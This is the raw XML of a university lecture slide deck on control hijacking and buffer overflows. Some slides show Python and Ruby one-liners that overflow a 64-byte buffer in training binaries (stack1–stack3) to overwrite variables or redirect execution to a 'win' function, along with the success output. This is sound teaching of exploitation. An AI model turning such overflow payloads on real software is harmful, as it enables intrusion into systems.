              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'print("A"*64 + "\x64\x63\x62\x61")'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`  |./stack1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you have correctly got the variable to the right value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90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1524000" y="666750"/>
          <a:ext cx="5486400" cy="3767138"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2050" name="Wordpad Document" r:id="rId3" imgW="5486400" imgH="5021640" progId="WordPad.Document.1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81000" y="4325323"/>
            <a:ext cx="6781800" cy="818177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22313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8F8F2"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$e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Inconsolata"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xport GREENIE=`python -c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Inconsolata"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'print("A"*64 + "\x0a\x0d\x0a\x0d")'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Inconsolata"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>`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Inconsolata"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ ./stack2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Inconsolata"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>you have correctly modified the variable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2133600" y="514350"/>
          <a:ext cx="5486400" cy="3243262"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s3074" name="Wordpad Document" r:id="rId3" imgW="5486400" imgH="4323240" progId="WordPad.Document.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82905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nm ./stack3 | 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grep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win 08048424 T win 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ruby -e 'print "X" * 64 +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[0x08048424].pack("V")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 | ./stack3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calling function pointer, jumping to 0x08048424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code flow successfully changed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845</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>211</Paragraphs>
  <Slides>23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Wordpad Document</vt:lpstr>
      <vt:lpstr>Chart</vt:lpstr>
      <vt:lpstr>Lecture 2: Systems and Network Security CSE 628/628A</vt:lpstr>
      <vt:lpstr>Lecture 1: Control Hijacking</vt:lpstr>
      <vt:lpstr>Module 1.1: Control Hijacking</vt:lpstr>
      <vt:lpstr>Acknowledgements</vt:lpstr>
      <vt:lpstr>Basic Control Hijacking Attacks</vt:lpstr>
      <vt:lpstr>Example 1 </vt:lpstr>
      <vt:lpstr>Example 2</vt:lpstr>
      <vt:lpstr>Example 3</vt:lpstr>
      <vt:lpstr>Example 4</vt:lpstr>
      <vt:lpstr>Control hijacking attacks</vt:lpstr>
      <vt:lpstr>Example 1:   buffer overflows</vt:lpstr>
      <vt:lpstr>What is needed</vt:lpstr>
      <vt:lpstr>Linux Process Memory Layout</vt:lpstr>
      <vt:lpstr>Stack Frame  http://post.queensu.ca/~trd/377/tut5/stack.html</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>Basic stack exploit</vt:lpstr>
      <vt:lpstr>The NOP slide</vt:lpstr>
      <vt:lpstr>Details and examples</vt:lpstr>
      <vt:lpstr>Many unsafe libc functions</vt:lpstr>
      <vt:lpstr>Buffer overflow opportunities</vt:lpstr>
      <vt:lpstr>Corrupting method pointers</vt:lpstr>
      <vt:lpstr>Poor man’s Buffer Overflow Finding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Control Hijacking</dc:title>
  <dc:creator>cse</dc:creator>
  <cp:lastModifiedBy>Deepak Kumar</cp:lastModifiedBy>
  <cp:revision>71</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-05T05:10:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-12T09:42:24Z</dcterms:modified>
</cp:coreProperties>
</file>